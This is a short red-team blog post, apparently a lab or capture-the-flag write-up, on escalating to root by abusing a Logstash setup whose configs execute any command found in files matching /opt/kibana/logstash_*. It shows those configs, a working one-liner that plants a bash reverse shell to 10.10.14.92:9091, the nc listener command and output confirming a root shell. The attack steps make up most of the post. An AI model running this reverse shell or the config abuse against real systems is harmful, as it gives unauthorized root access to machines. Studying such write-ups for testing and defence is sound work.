Hi Red Team
Today, I am going to share on how to do the post exploitation by abusing the logstash configuration on the victim machine.
I found logstash is running under root privilege when I did the post exploitation enumeration using linpeas.sh
Lets find out more configuration setting of the logstash. It is normally located in the /etc/logstash/conf.d/
Let’s check the input.conf
input {
file {
path => "/opt/kibana/logstash_*"
start_position => "beginning"
sincedb_path => "/dev/null"
stat_interval => "10 second"
type => "execute"
mode => "read"
}
}
Let’s check the filter.conf
filter {
if [type] == "execute" {
grok {
match => { "message" => "Exec_This\s*Command\s*:\s+%{GREEDYDATA:Command}" }
}
}
}
Lets check the output.conf
output {
if [type] == "execute" {
stdout { codec => json }
exec {
command => "%{Command} &"
}
}
}
So, based on the above 3 configuration files input, filter and output then we can conclude that the logstash will try to load file from /opt/kibana/logstash_* so all files with name start with logstash_ will be loaded and read. Then with the information from the filter.conf we can see that it will do text search with patter “Exec_This Command : [COMMAND]” and finally the output.conf configuration tells us that it will execute the [COMMAND].
To exploit this configuration then we can create a file in /opt/kibana/logstash_execute which contain this command to create reverse shell
echo 'Exec_This Command : bash -i >& /dev/tcp/10.10.14.92/9091 0>&1' > /opt/kibana/logstash_execute
Then you need to start nc server on your machine to receive the reverse shell. After waiting for few minutes then the scheduler under root will run the logstash read and execute the reverse shell
$ rlwrap nc -nlvp 9091
listening on [any] 9091 ...
connect to [10.10.14.92] from (UNKNOWN) [10.129.175.228] 41724
We got the reverse connection as root
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis 